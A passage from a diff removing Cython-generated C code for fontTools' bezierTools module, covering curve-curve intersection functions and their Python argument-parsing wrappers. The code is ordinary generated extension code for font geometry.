__PYX_ERR(0, 1349, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1348 - * ) - * ) - * found.extend( # <<<<<<<<<<<<<< - * _curve_curve_intersections_t( - * c11, c22, precision, range1=c11_range, 
range2=c22_range - */ - __pyx_t_9 = __Pyx_PyList_Extend(__pyx_v_found, __pyx_t_7); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1348, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - - /* "fontTools/misc/bezierTools.py":1354 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c12, c22, precision, range1=c12_range, range2=c22_range - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_curve_curve_intersections_t); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1354, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - - /* "fontTools/misc/bezierTools.py":1355 - * found.extend( - * _curve_curve_intersections_t( - * c12, c22, precision, range1=c12_range, range2=c22_range # <<<<<<<<<<<<<< - * ) - * ) - */ - __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1354, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_c12); - __Pyx_GIVEREF(__pyx_v_c12); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_c12)) __PYX_ERR(0, 1354, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c22); - __Pyx_GIVEREF(__pyx_v_c22); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_c22)) __PYX_ERR(0, 1354, __pyx_L1_error); - __Pyx_INCREF(__pyx_cur_scope->__pyx_v_precision); - __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_precision); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_cur_scope->__pyx_v_precision)) __PYX_ERR(0, 1354, __pyx_L1_error); - __pyx_t_2 = __Pyx_PyDict_NewPresized(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1355, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_range1, __pyx_v_c12_range) < 0) __PYX_ERR(0, 1355, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_range2, __pyx_v_c22_range) < 0) __PYX_ERR(0, 1355, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1354 - * ) - * found.extend( - * _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * c12, c22, precision, range1=c12_range, range2=c22_range - * ) - */ - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_7, __pyx_t_1, __pyx_t_2); if 
(unlikely(!__pyx_t_3)) __PYX_ERR(0, 1354, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1353 - * ) - * ) - * found.extend( # <<<<<<<<<<<<<< - * _curve_curve_intersections_t( - * c12, c22, precision, range1=c12_range, range2=c22_range - */ - __pyx_t_9 = __Pyx_PyList_Extend(__pyx_v_found, __pyx_t_3); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1353, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1359 - * ) - * - * unique_key = lambda ts: (int(ts[0] / precision), int(ts[1] / precision)) # <<<<<<<<<<<<<< - * seen = set() - * unique_values = [] - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_2lambda3, 0, __pyx_n_s_curve_curve_intersections_t_loc_2, ((PyObject*)__pyx_cur_scope), __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1359, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_unique_key = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1360 - * - * unique_key = lambda ts: (int(ts[0] / precision), int(ts[1] / precision)) - * seen = set() # <<<<<<<<<<<<<< - * unique_values = [] - * - */ - __pyx_t_3 = PySet_New(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1360, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_seen = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1361 - * unique_key = lambda ts: (int(ts[0] / precision), int(ts[1] / precision)) - * seen = set() - * unique_values = [] # <<<<<<<<<<<<<< - * - * for ts in found: - */ - __pyx_t_3 = PyList_New(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1361, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_unique_values = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1363 - * unique_values = [] - * - * for ts 
in found: # <<<<<<<<<<<<<< - * key = unique_key(ts) - * if key in seen: - */ - __pyx_t_3 = __pyx_v_found; __Pyx_INCREF(__pyx_t_3); - __pyx_t_10 = 0; - for (;;) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_3); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1363, __pyx_L1_error) - #endif - if (__pyx_t_10 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_2 = PyList_GET_ITEM(__pyx_t_3, __pyx_t_10); __Pyx_INCREF(__pyx_t_2); __pyx_t_10++; if (unlikely((0 < 0))) __PYX_ERR(0, 1363, __pyx_L1_error) - #else - __pyx_t_2 = __Pyx_PySequence_ITEM(__pyx_t_3, __pyx_t_10); __pyx_t_10++; if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1363, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - __Pyx_XDECREF_SET(__pyx_v_ts, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1364 - * - * for ts in found: - * key = unique_key(ts) # <<<<<<<<<<<<<< - * if key in seen: - * continue - */ - __pyx_t_2 = __pyx_lambda_funcdef_lambda3(__pyx_v_unique_key, __pyx_v_ts); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1364, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_XDECREF_SET(__pyx_v_key, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1365 - * for ts in found: - * key = unique_key(ts) - * if key in seen: # <<<<<<<<<<<<<< - * continue - * seen.add(key) - */ - __pyx_t_6 = (__Pyx_PySet_ContainsTF(__pyx_v_key, __pyx_v_seen, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1365, __pyx_L1_error) - if (__pyx_t_6) { - - /* "fontTools/misc/bezierTools.py":1366 - * key = unique_key(ts) - * if key in seen: - * continue # <<<<<<<<<<<<<< - * seen.add(key) - * unique_values.append(ts) - */ - goto __pyx_L15_continue; - - /* "fontTools/misc/bezierTools.py":1365 - * for ts in found: - * key = unique_key(ts) - * if key in seen: # <<<<<<<<<<<<<< - * continue - * seen.add(key) - */ - } - - /* "fontTools/misc/bezierTools.py":1367 - * if key in seen: - * continue - * seen.add(key) # 
<<<<<<<<<<<<<< - * unique_values.append(ts) - * - */ - __pyx_t_9 = PySet_Add(__pyx_v_seen, __pyx_v_key); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1367, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1368 - * continue - * seen.add(key) - * unique_values.append(ts) # <<<<<<<<<<<<<< - * - * return unique_values - */ - __pyx_t_9 = __Pyx_PyList_Append(__pyx_v_unique_values, __pyx_v_ts); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 1368, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1363 - * unique_values = [] - * - * for ts in found: # <<<<<<<<<<<<<< - * key = unique_key(ts) - * if key in seen: - */ - __pyx_L15_continue:; - } - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1370 - * unique_values.append(ts) - * - * return unique_values # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_unique_values); - __pyx_r = __pyx_v_unique_values; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_curve_intersections_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_bounds1); - __Pyx_XDECREF(__pyx_v_bounds2); - __Pyx_XDECREF(__pyx_v_intersects); - __Pyx_XDECREF(__pyx_v__); - __Pyx_XDECREF(__pyx_v_midpoint); - __Pyx_XDECREF(__pyx_v_c11); - __Pyx_XDECREF(__pyx_v_c12); - __Pyx_XDECREF(__pyx_v_c11_range); - __Pyx_XDECREF(__pyx_v_c12_range); - __Pyx_XDECREF(__pyx_v_c21); - __Pyx_XDECREF(__pyx_v_c22); - __Pyx_XDECREF(__pyx_v_c21_range); - __Pyx_XDECREF(__pyx_v_c22_range); - __Pyx_XDECREF(__pyx_v_found); - __Pyx_XDECREF(__pyx_v_unique_key); - __Pyx_XDECREF(__pyx_v_seen); - 
__Pyx_XDECREF(__pyx_v_unique_values); - __Pyx_XDECREF(__pyx_v_ts); - __Pyx_XDECREF(__pyx_v_key); - __Pyx_XDECREF(__pyx_v_range1); - __Pyx_XDECREF(__pyx_v_range2); - __Pyx_DECREF((PyObject *)__pyx_cur_scope); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1373 - * - * - * def curveCurveIntersections(curve1, curve2): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a curve. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_87curveCurveIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_86curveCurveIntersections, "curveCurveIntersections(curve1, curve2)\nFinds intersections between a curve and a curve.\n\n Args:\n curve1: List of coordinates of the first curve segment as 2D tuples.\n curve2: List of coordinates of the second curve segment as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve1 = [ (10,100), (90,30), (40,140), (220,220) ]\n >>> curve2 = [ (5,150), (180,20), (80,250), (210,190) ]\n >>> intersections = curveCurveIntersections(curve1, curve2)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (81.7831487395506, 109.88904552375288)\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_87curveCurveIntersections = {"curveCurveIntersections", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_87curveCurveIntersections, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_86curveCurveIntersections}; -static PyObject 
*__pyx_pw_9fontTools_4misc_11bezierTools_87curveCurveIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_curve1 = 0; - PyObject *__pyx_v_curve2 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("curveCurveIntersections (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_curve1,&__pyx_n_s_curve2,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1373, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1373, __pyx_L3_error) - else { - 
__Pyx_RaiseArgtupleInvalid("curveCurveIntersections", 1, 2, 2, 1); __PYX_ERR(0, 1373, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "curveCurveIntersections") < 0)) __PYX_ERR(0, 1373, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_curve1 = values[0]; - __pyx_v_curve2 = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("curveCurveIntersections", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1373, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.curveCurveIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_86curveCurveIntersections(__pyx_self, __pyx_v_curve1, __pyx_v_curve2); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_86curveCurveIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve1, PyObject *__pyx_v_curve2) { - PyObject *__pyx_v_intersection_ts = NULL; - PyObject *__pyx_8genexpr7__pyx_v_ts = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 
= NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - Py_ssize_t __pyx_t_5; - PyObject *(*__pyx_t_6)(PyObject *); - PyObject *__pyx_t_7 = NULL; - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("curveCurveIntersections", 1); - - /* "fontTools/misc/bezierTools.py":1394 - * (81.7831487395506, 109.88904552375288) - * """ - * intersection_ts = _curve_curve_intersections_t(curve1, curve2) # <<<<<<<<<<<<<< - * return [ - * Intersection(pt=segmentPointAtT(curve1, ts[0]), t1=ts[0], t2=ts[1]) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_curve_curve_intersections_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1394, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_curve1, __pyx_v_curve2}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1394, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_v_intersection_ts = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1395 - * """ - * intersection_ts = _curve_curve_intersections_t(curve1, curve2) - * return [ # <<<<<<<<<<<<<< - * Intersection(pt=segmentPointAtT(curve1, ts[0]), t1=ts[0], t2=ts[1]) - * for ts in intersection_ts - */ - __Pyx_XDECREF(__pyx_r); - { /* enter inner scope */ - __pyx_t_1 = PyList_New(0); if 
(unlikely(!__pyx_t_1)) __PYX_ERR(0, 1395, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":1397 - * return [ - * Intersection(pt=segmentPointAtT(curve1, ts[0]), t1=ts[0], t2=ts[1]) - * for ts in intersection_ts # <<<<<<<<<<<<<< - * ] - * - */ - if (likely(PyList_CheckExact(__pyx_v_intersection_ts)) || PyTuple_CheckExact(__pyx_v_intersection_ts)) { - __pyx_t_2 = __pyx_v_intersection_ts; __Pyx_INCREF(__pyx_t_2); - __pyx_t_5 = 0; - __pyx_t_6 = NULL; - } else { - __pyx_t_5 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_intersection_ts); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1397, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 1397, __pyx_L5_error) - } - for (;;) { - if (likely(!__pyx_t_6)) { - if (likely(PyList_CheckExact(__pyx_t_2))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1397, __pyx_L5_error) - #endif - if (__pyx_t_5 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_3 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_5); __Pyx_INCREF(__pyx_t_3); __pyx_t_5++; if (unlikely((0 < 0))) __PYX_ERR(0, 1397, __pyx_L5_error) - #else - __pyx_t_3 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_5); __pyx_t_5++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1397, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_2); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1397, __pyx_L5_error) - #endif - if (__pyx_t_5 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_3 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_5); __Pyx_INCREF(__pyx_t_3); __pyx_t_5++; if (unlikely((0 < 0))) __PYX_ERR(0, 1397, __pyx_L5_error) - #else - __pyx_t_3 = __Pyx_PySequence_ITEM(__pyx_t_2, __pyx_t_5); __pyx_t_5++; if 
(unlikely(!__pyx_t_3)) __PYX_ERR(0, 1397, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - } - } else { - __pyx_t_3 = __pyx_t_6(__pyx_t_2); - if (unlikely(!__pyx_t_3)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1397, __pyx_L5_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_3); - } - __Pyx_XDECREF_SET(__pyx_8genexpr7__pyx_v_ts, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1396 - * intersection_ts = _curve_curve_intersections_t(curve1, curve2) - * return [ - * Intersection(pt=segmentPointAtT(curve1, ts[0]), t1=ts[0], t2=ts[1]) # <<<<<<<<<<<<<< - * for ts in intersection_ts - * ] - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_segmentPointAtT); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = __Pyx_GetItemInt(__pyx_8genexpr7__pyx_v_ts, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_10); - __pyx_t_11 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_11)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_11); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_11, __pyx_v_curve1, __pyx_t_10}; - __pyx_t_8 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; - __Pyx_DECREF(__pyx_t_10); 
__pyx_t_10 = 0; - if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_pt, __pyx_t_8) < 0) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = __Pyx_GetItemInt(__pyx_8genexpr7__pyx_v_ts, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_8); - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_t1, __pyx_t_8) < 0) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = __Pyx_GetItemInt(__pyx_8genexpr7__pyx_v_ts, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_8); - if (PyDict_SetItem(__pyx_t_7, __pyx_n_s_t2, __pyx_t_8) < 0) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_empty_tuple, __pyx_t_7); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1396, __pyx_L5_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_t_8))) __PYX_ERR(0, 1395, __pyx_L5_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":1397 - * return [ - * Intersection(pt=segmentPointAtT(curve1, ts[0]), t1=ts[0], t2=ts[1]) - * for ts in intersection_ts # <<<<<<<<<<<<<< - * ] - * - */ - } - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_XDECREF(__pyx_8genexpr7__pyx_v_ts); __pyx_8genexpr7__pyx_v_ts = 0; - goto __pyx_L9_exit_scope; - __pyx_L5_error:; - __Pyx_XDECREF(__pyx_8genexpr7__pyx_v_ts); __pyx_8genexpr7__pyx_v_ts = 0; - goto __pyx_L1_error; - __pyx_L9_exit_scope:; - } /* exit inner scope */ - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1373 - * - * - * def 
curveCurveIntersections(curve1, curve2): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a curve. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_AddTraceback("fontTools.misc.bezierTools.curveCurveIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_intersection_ts); - __Pyx_XDECREF(__pyx_8genexpr7__pyx_v_ts); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1401 - * - * - * def segmentSegmentIntersections(seg1, seg2): # <<<<<<<<<<<<<< - * """Finds intersections between two segments. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_89segmentSegmentIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_88segmentSegmentIntersections, "segmentSegmentIntersections(seg1, seg2)\nFinds intersections between two segments.\n\n Args:\n seg1: List of coordinates of the first segment as 2D tuples.\n seg2: List of coordinates of the second segment as 2D tuples.\n\n 